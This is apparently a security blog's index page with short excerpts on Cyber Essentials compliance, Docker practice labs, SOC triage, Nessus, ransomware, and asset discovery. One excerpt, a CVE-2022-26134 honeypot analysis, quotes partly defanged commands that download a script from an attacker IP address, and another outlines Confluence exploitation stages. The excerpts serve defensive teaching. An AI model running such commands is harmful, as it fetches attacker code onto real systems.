Creating a tracker and dashboard for Cyber Essentials

I was talking to a friend about a requirement to “measure” cyber essentials compliance. Now if you know a thing or two about standards and applying standards to complex technology environments you might come up with:

Can’t we just script a checker?
Don’t we have all the audit data in the *checks notes* 1000 inventory systems we have?

Well sure, you could write a massive set of rules which ignore any context and try and cater for a huge number of different scenarios. You could use the Q&A approach as well (which is how the standard workbook works anyway so that already exists). But let’s say you are an IT manager, and you want to KNOW how your environment stacks up!

The question is simple, it’s easy to ask, look:

“How compliant are we against Cyber Essentials?”

Deploy a mini Pentester Lab with Docker

I build VM labs. Lots of them, but I tend to go full machines. I was checking out the new TCM web app course the other day (honestly i’ll write a review if I get time to finish it!) and it’s built around using docker for DVWA and OWASP JUICE SHOP so I figured I should write a quick blog about how to deploy these so people can get started learning in minutes.

Now here we have:

DVWA
JUICESHOP
METASPLOITABLE

but you don’t have to stop there, i’m sure there’s others you can use as well!

This isn’t an exhaustive guide, but it will get the docker instances up and running.

Learn to SOC: Cryptominer Analysis

I’m totally in the middle of doing some work but this alert just came in so I have quickly dumped the data:

This came in via a Confluence exploit (not sure which CVE yet). I’ve not got time to analyse but thought I’d share this as an educational excercise for people! It’s a good excercise to see the apache tomcat logs and then decode, obtain samples and analyse the activity/imapct (as well as yoink IOCs etc.)

Installing Nessus Pro on Kali Linux

You can deploy Nessus in a range of ways, from direct install through to using a cloud-based deployment or virtual appliance.

A common reason for deploying on Kali or other distro rather than using the virtual appliance is for mobility, ease of use but also you might want to VPN or proxy traffic.

The install process is simple, log into your account on tenable community portal and download the relevant installation package.

Learn to be a SOC Analyst – Confluence and…

The guidance here is also useful with a post on parsing Confluence logs for an RCE using OGNL injection.

Warning – CERBER RANSOMWARE

The contents of this blog if executed could get you ransomwared so maybe be careful (I’ll de-fang some bits so if you are having issues following along fix the fangs, plus the payloads will get taken down)

To support a high levle view here is the rough stages that would occur in a successful deployment by a threat actor against a vulnerable target:

Recon

Find servers with Confluence that aren’t patched.

Send Log4J Exploit with Stage0 payload

Text

Description automatically generated with medium confidence

CVE-2022-26134 – Honeypot Payload Analysis Example

Threat actors are deploying a range of payloads to try and leverage vulnerable confluence servers around the globe. This just dropped into one of the pots:

HTTP Command Executes this:

curl http[:]//202.28.229.174/ap[.]sh?confcurl

This download the following (ap.sh)

$stealz = wget -Uri http[:]//202.28.229[.]174/ap[.]sh?confcurl -UseBasicParsing

$stealz.Content | Out-File ap.txt

Passive Port Scanners & Internet Asset Discovery Platforms

Useful for a range of defensive and offensive purposes, internet asset search platforms enable a range of activities from:

Research & Trend Analysis
Vulnerability Hunting
Attack Surface Mapping
OSINT

Each has its own interfaces, features, dataset sand styles.

I’ve put together a list of the most popular, there may be more that I haven’t listed.

The CYBER GANG Cookbook

Volume 1

Introduction

I am sitting here, and I need another cup of tea, but I thought I’d start to have a think about what common “CYBER GANGS” look like. This isn’t criminal or non-criminal. But you know there’s some commonality between both. I thought this was fun little thinking exercise to show the duality of life, what digital worlds look like but also to give a glimpse into the mysteryious (its not!) world of cyberz (including crime!)

Stop rushing for “the solution”!

Before you start solutioning

Everyone these days seems to rush towards “the solution”, well as someone who now has few years under their belt, I’d advise people slow down a little and think about their business requirements, outcomes, current state, and constraints. Significantly as well think about how a service will run over a period, not just how to buy it and “fling it into production”.

Real World Consumer Cyber Security

Cyber in the Consumer World

My focus normally is on business to business (B2B) environments and “Enterprise” computing and cyber security. However, I’ve been known to venture into the consumer world from time to time. I wondered whether people would be interested in exploring with me what cyber security in the consumer world look like?

Last week I set on an adventure to see what “hacking” myself might look like. I’m thinking that there might be more to this than a fleeting glance at Instagram hacking and a bit of fun on twitter with alts. Maybe we need to look at consumer security and how/if we have got a good user experience in this space?